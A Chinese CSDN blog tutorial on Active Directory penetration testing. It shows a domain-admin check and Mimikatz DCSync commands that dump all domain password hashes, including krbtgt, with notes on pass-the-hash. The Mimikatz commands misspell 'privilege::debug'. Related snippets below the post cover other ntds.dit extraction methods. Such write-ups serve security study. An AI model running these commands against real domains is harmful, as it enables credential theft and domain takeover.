渗透测试——域管用户冒充备份域控获取ntds.dit

已于 2024-07-25 21:12:20 修改
阅读量380 收藏 1
点赞数 16
文章标签: 安全
于 2024-06-19 13:17:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74171325/article/details/139799560
版权

目录

 使用以下命令判断用户权限

 判断是域管用户

使用Mimikatz工具冒充备份域控进行获取ntds.dit

查看某用户的详细信息

 使用以下命令判断用户权限

#administrator是通过whoami获取的
net user administrator /domain

 判断是域管用户

使用Mimikatz工具冒充备份域控进行获取ntds.dit

  1. 攻击者获得管理员及以上权限后,可以使用Mimikatz等工具模拟Active Directory域控制器
  2. 然后攻击者使用DCSync命令,在目标域控制器上请求某个指定帐户的NTLM存储凭证密码哈希值,而无需提供该帐户的明文密码。但是攻击者需要知道目标帐户的名称,以及目标系统的域名和管理员凭据。
  3. 目标域控制器接收到此请求后,将密码哈希值返回给攻击者。
  4. 攻击者可以使用获得的密码哈希值来执行其他攻击,例如Pass-the-Hash攻击,这种攻击技术允许攻击者使用哈希值进行身份验证并获取对系统的访问权限,而无需知道实际的明文密码。此外,攻击者也可以尝试破解密码哈希值以获得明文密码。
mimikatz.exe "prvilege::debug" "lsadump::dcsync /domain:crazy.com /all /csv" "exit"

 成功读取hash

查看某用户的详细信息

mimikatz.exe  "prvilege::debug"  "lsadump::dcsync /domain:crazy.com /user:krbtgt" "exit"

古希腊掌管猴子的神
关注
导出域控ntds.dit文件
谢公子的博客
02-08 2922
目录 NTDS.dit 通过ntdsutil.exe提取NTDS.dit 通过vssadmin提取ntds.dit 通过vssown.vbs脚本提取ntds.dit 使用ntdsutil的IFM创建卷影拷贝 使用diskshadow导出ntds.dit 导出SYSTEM文件 主机运维人员监控卷影拷贝服务的使用情况 NTDS.dit 在活动目录中,所有的数据都保存在域控的 ntd...
服务器渗透文件,域渗透——获得域控服务器的NTDS.dit文件
weixin_39603217的博客
08-03 566
0x00 前言在之前的文章《导出当前域内所有用户hash的技术整理》曾介绍过通过Volume Shadow Copy实现对ntds.dit文件的复制, 可用来导出域内所有用户hash。本文将尝试做系统总结,总结多种不同的方法。0x01 简介本文将要介绍以下内容:多种实现方法比较优缺点0x02 通过Volume Shadow Copy获得域控服务器NTDS.dit文件测试系统:Server 2008...
域凭据获取——利用NTDS.DIT获取windows域哈希
qq_55202378的博客
08-05 877
NTDS.DIT文件是域控制器的数据库文件,该文件作为AD的数据库,存储了AD的所有数据,包括域内的用户对象、组和组成员身份等信息,以及域内所有用户的凭据信息。该文件位于域控制器下的根目录下。NTDS.DIT文件与Windows主机中的SAM文件类似,不同点在于SAM文件中只存放本机的用户哈希,而NTDS.DIT文件中存放了所有域用户的哈希凭据。在windows中NTDS.DIT文件同样被Windows系统锁定,正常操作无法复制该文件,权限低于system的用户将无法读取。
域控安全:多种方式提取ntds.dit
8888的博客
08-07 1111
ntds.dit为AD的数据库,内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控用户(如域管用户、DC本地管理员用户)可以访问。可以通过创建一个 IFM 的方式获取 ntds.dit,在使用 ntdsutil 创建媒体安装集(IFM)时,需要进行生成快照、加载、将 ntds.dit 和计算机的 SAM 文件复制到目标文件夹中等操作,这些操作也可以通过PowerShell 或 VMI 远程执行。第三步:复制快照中的ntds.dit文件。第二步:创建一个C盘的卷影副本。
域渗透之获得域控服务器的NTDS.dit文件
cj_Hydra's Blog
02-15 2093
前言: ntds.dit是主要的AD数据库,存放在c:\windows\NTDS\NTDS.dit,包括有关域用户,组和成员身份的信息,它还包括域中所有用户的密码哈希值,为了进一步保护哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。 因为这两个文件属于系统特殊文件,不能直接复制粘贴,所以需要用特殊的方式来复制粘贴。 当我们拿到域控的权限后,我们可以跑域内所有的hash值,...
渗透测试——卷影复制服务下载NTDS.dit(拿到域控
weixin_74171325的博客
06-16 228
记住这三信息Shadow copy device name、SnapshotSetID、SNAPSHOT ID。在域控的情况下,由于ntds.dit在使用,所以它不能进行移动下载到桌面更不能拿出来,下面解释两种方式。出现和C盘一样的快照,这样就可以进快照获取ntds.dit了。ntdsutil按步骤执行命令创建快照。成功获取到,可以进行下载。
域控安全 ----> Ntds.dit文件抓取
huohaowen的博客
05-05 1721
大家还记得内网渗透的初衷吗???找到域馆,拿下域控!!拿下了域控就是拿下了整个域!!但是大家知道拿下域环境之后应该怎么操作吗(灵魂拷问)???那么下面,开始我们今天的内容 NTDS.DIT文件!!
域之ntds.dit
SecINAdmin的博客
11-26 1403
ntds.ditntds.dit为ad的数据库(C:\Windows\NTDS),内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控用户(如域管用户、DC本地管理员用户)可以访问。ntds.dit包括三个主要表:数据表、链接表、sd表。所以只要在域渗透中能够获取ntds.dit就可以获取到所有域用户用户名和对应的hash,ntds.dit是加密的,需要获取system来解密。查看dit数据库可使用https://github.com/yosqueoy/ditsna
域控安全:读取ntds.dit文件中的hash值
8888的博客
08-08 965
在线的方式就是直接读取不需要在导出ntds文件,在域环境中,不要直接在线获取hash,特别是域环境比较大的时候,在线获取hash等待时时间较长,工具占用资源太多,容易造成域控服务器崩溃。2.将ntds.dit文件复制到这个工具目录里面然后导出,两个重要的表为:datatable以及link_table,他们都会被存放在./ntds.dit.export/文件夹中。使用secretsdump直接读取,需要有高权限的票据,IPC,什么的,可以远程读取目标机器的hash,就是远程读取。2、然后利用再在本地进行。
8、域渗透——获得域控服务器的NTDS.dit文件
Fly_鹏程万里
06-11 2904
0x00 前言在之前的文章《导出当前域内所有用户hash的技术整理》曾介绍过通过Volume Shadow Copy实现对ntds.dit文件的复制,可用来导出域内所有用户hash。本文将尝试做系统总结,总结多种不同的方法。0x01 简介本文将要介绍以下内容:多种实现方法比较优缺点0x02 通过Volume Shadow Copy获得域控服务器NTDS.dit文件测试系统:Server 2008 ...
利用卷影拷贝服务提取ntds.dit
hongduilanjun的博客
07-21 778
在活动目录中,所有的数据都保存在ntds.dit中。ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot%\ntds\ntds.ditntds.dit中包含用户名、散列值、组、GPP、OU等与活动目录相关的信息。它和SAM文件一样,是被操作系统锁定的。在一般情况下系统运维人员会利用卷影拷贝服务(volumeShadowCopyServer,VSS)实现ntds.dit的拷贝,VSS本质上属快照(Snamshot)技术的一种,主要用于备份和恢复(即使目标文件被系统锁定)。...
【内网学习笔记】26、ntds.dit 的提取与散列值导出
TeamsSix 的 CSDN 空间
09-09 1414
0、前言 在活动目录中,所有数据都保存在 ntds.dit 文件中,ntds.dit 是一个二进制文件,存储位置为域控的 %SystemRoot%\ntds.dit ntds.dit 中包含(但不限于)用户名、散列值、组、GPP、OU 等与活动目录相关的信息,因此如果我们拿到 ntds.dit 就能获取到域内所有用户的 hash 在通常情况下,即使拥有管理员权限,也无法读取域控中的 ntds.dit 文件(因为活动目录始终访问这个文件,所以文件被禁止读取),它和 SAM 文件一样,是被 Windows 操作
导出ntds.dit中的散列值
weixin_41082546的博客
02-15 388
1.下载NTDSX http://www.ntdsxtract.com git clonehttps://github.com/csababarta/ntdsxtract 安装 python setup.py build && python setup.py install 将导出的ntds.dit.export 文件夹中的datatable.3和link_table....
基于 SM3 的密钥派生函数 (KDF):国密合规的安全密钥生成方案
A_Lonely_Smile的博客
10-29 735
在现代加密技术中,密钥派生函数(Key Derivation Function, KDF)是一个将初始输入(如密码、共享密钥等)转换为安全密钥的过程,用于实现加密、消息认证等密码操作。特别是在符合国密标准的场景中,基于 SM3 的 KDF 已成为一种常用的密钥生成方式。本文将详细讲解 SM3-KDF 的工作原理,逐步介绍其实现过程,并提供 Java 代码示例,帮助您理解如何在项目中应用 SM3-KDF。
安全知识见闻-脚本语言对与安全的重要性
2201_75446043的博客
10-27 1168
批处理文件是以.bat扩展名结尾的文本文件,其中包含一系列命令,通常用于自动化任务。在Windows操作系统中,批处理文件可以通过命令提示符(CMD)运行。PowerShell是微软推出的一种任务自动化和配置管理框架,结合了命令行界面和脚本语言的特性。它的命令称为“cmdlet”,支持对象导向,能够处理复杂的数据结构。编写宏病毒、脚本病毒、BIOS病毒或进行内网渗透都需要特定的技术知识和编程技能,类似的脚本病毒还有很多,无法一一列举。
服务攻防之开发组件安全
qq_63831588的博客
10-28 1182
log4j 是 Apache 的一个开源日志库,是一个基于 Java 的日志记录框架,Log4j2 是 log4j 的后继者,其中引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI 组建等,被应用于业务系统开发,用于记录程序输入输出日志信息,log4j2 中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞,成功利用该漏洞可在目标服务器上执行任意代码。
API接口开放与安全管控 - 原理与实践
whisperzzza的博客
10-27 1330
API安全是接口开放的前提条件 在API对外开放时,确保其安全性至关重要,因为API直接暴露给外部环境,容易成为攻击目标。一旦被恶意利用,可能导致数据泄露、服务滥用等严重后果。因此,通过API网关实施严格的接口安全管理措施,如身份验证、访问控制和流量限制,成为保护后端服务免受威胁的第一道防线。这不仅有助于维护系统的稳定性和可靠性,还能增强用户对平台的信任度。
【 纷享销客-注册安全分析报告-无验证方式导致安全隐患】
最新发布
10-31 515
纷享销客(北京易动纷享科技有限责任公司)总部位于北京市海淀区中关村,目前在北京、上海、广州、深圳、杭州、南京、武汉、成都、长沙、郑州、西安、济南、香港等13个城市设立直营省分公司,在全国50余个城市建立营销服务中心。截至目前,员工总数1000余人,产品研发团队300余人,是一家具备完善的研发、实施交付能力的优质SaaS企业。纷享销客以连接型CRM为特色,连接业务,连接人,连接系统,实现以客户为中心,企业内部和上下游业务的高效协作。
【商汤科技-注册/登录安全分析报告】
10-26 1595
作为人工智能软件公司,商汤科技以“坚持原创,让AI引领人类进步”为使命,旨在持续引领人工智能前沿研究,持续打造更具拓展性更普惠的人工智能软件平台,推动经济、社会和人类的发展,并持续吸引及培养顶尖人才,共同塑造未来。商汤科技拥有深厚的学术积累,并长期投入于原创技术研究,不断增强行业领先的多模态、多任务通用人工智能能力。
AD备份与恢复:Ntds.dit、SYSVOL详解
在恢复过程中,通常会使用备份Ntds.dit和日志文件来重建AD数据库,同时恢复SYSVOL以保持域内的配置一致性。如果服务器崩溃或发生硬件故障,这些备份将至关重要,能够快速恢复服务,减少业务中断时间。 此外,了解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

古希腊掌管猴子的神

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值